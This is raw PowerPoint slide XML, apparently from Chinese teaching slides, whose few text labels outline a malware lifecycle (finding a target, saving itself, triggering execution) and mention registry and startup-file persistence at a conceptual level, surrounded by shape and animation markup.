                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>系统重启后的触发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>各种启动项（如注册表，启动文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286733" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C37E79D1-49C8-4D0D-BA99-856EA7C579B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1692275" y="3500438"/>
            <a:ext cx="1079500" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 46832"/>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6686" name="Line 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{178CFB93-8F0B-4F6C-99D3-0A40FD1A1B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="0"/>
            <a:ext cx="0" cy="1916113"/>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hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="6" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286730"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286730"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286730"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286730"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="10" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 0 C -0.00243 0.01641 -0.0099 0.02705 -0.0191 0.03792 C -0.03247 0.05364 -0.04827 0.07075 -0.06511 0.08023 C -0.07014 0.083 -0.07587 0.0837 -0.08091 0.08647 C -0.09688 0.09503 -0.11268 0.10451 -0.12848 0.11399 C -0.14653 0.12485 -0.16459 0.14058 -0.18403 0.14566 C -0.18993 0.14959 -0.19532 0.15514 -0.20157 0.15838 C -0.21997 0.16786 -0.20851 0.15699 -0.22535 0.16902 C -0.23421 0.17526 -0.23993 0.18266 -0.24914 0.18798 C -0.26493 0.19722 -0.28195 0.2067 -0.29844 0.21341 C -0.31528 0.22035 -0.33334 0.2215 -0.3507 0.22404 C -0.37535 0.23329 -0.40157 0.23769 -0.42691 0.24092 C -0.43993 0.24509 -0.4507 0.25572 -0.46355 0.25988 C -0.4724 0.26728 -0.47969 0.27699 -0.48889 0.28324 C -0.49254 0.29295 -0.4974 0.30243 -0.5 0.31283 C -0.50139 0.31838 -0.50174 0.32416 -0.50313 0.32971 C -0.50365 0.33179 -0.50417 0.33387 -0.50469 0.33595 C -0.50591 0.35052 -0.50764 0.36254 -0.51112 0.37618 C -0.51302 0.43052 -0.51268 0.40717 -0.51268 0.44601 " pathEditMode="relative" ptsTypes="ffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286730"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="286733"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286733"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286733"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286733"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">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86732">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">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86732">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">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86732">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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286732">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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286732">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>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2" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>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286732">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>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286732">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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286732">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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2" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286732">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>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286732">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28673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0" grpId="0" animBg="1"/>
      <p:bldP spid="286730" grpId="1" animBg="1"/>
      <p:bldP spid="286732" grpId="0" build="allAtOnce" animBg="1"/>
      <p:bldP spid="286733"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7698" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D43A2FF2-3FE0-4E02-82A7-D166657EF0B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="612775" y="117475"/>
            <a:ext cx="863600" cy="1439863"/>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寻找目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157699" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88BBA68A-D4A3-4F9F-A74A-8AE65D06D7F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284480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在目标之中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将自身保存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157700" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A13F29D1-A410-4B6D-8551-A86CD98E6D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5365750"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恶意代码执行</a:t>
            </a:r>
          </a:p>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目标系统中的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>触发</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157701" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0EF37B3-8BB8-4B7B-9AFA-C8906852FA6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7453313" y="115888"/>
            <a:ext cx="863600" cy="1439862"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0000FF"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="157702" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDDE885-6A61-431A-BEF6-7F3006634D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="157698" idx="3"/>
            <a:endCxn id="157699" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1476375" y="836613"/>
            <a:ext cx="1368425" cy="1587"/>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7703" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA4D28B-4B11-4E20-8ECA-7DF93A07165A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="157699" idx="3"/>
            <a:endCxn id="157700" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="836613"/>
            <a:ext cx="1657350"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="157704" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B15397D-694A-48D5-95C6-D5924230217A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="157700" idx="3"/>
            <a:endCxn id="157701" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6229350" y="836613"/>
            <a:ext cx="1223963" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157705" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4257812-CE53-49FD-BC98-63DC0F037CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500563" y="-100013"/>
            <a:ext cx="0" cy="2016126"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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87754" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
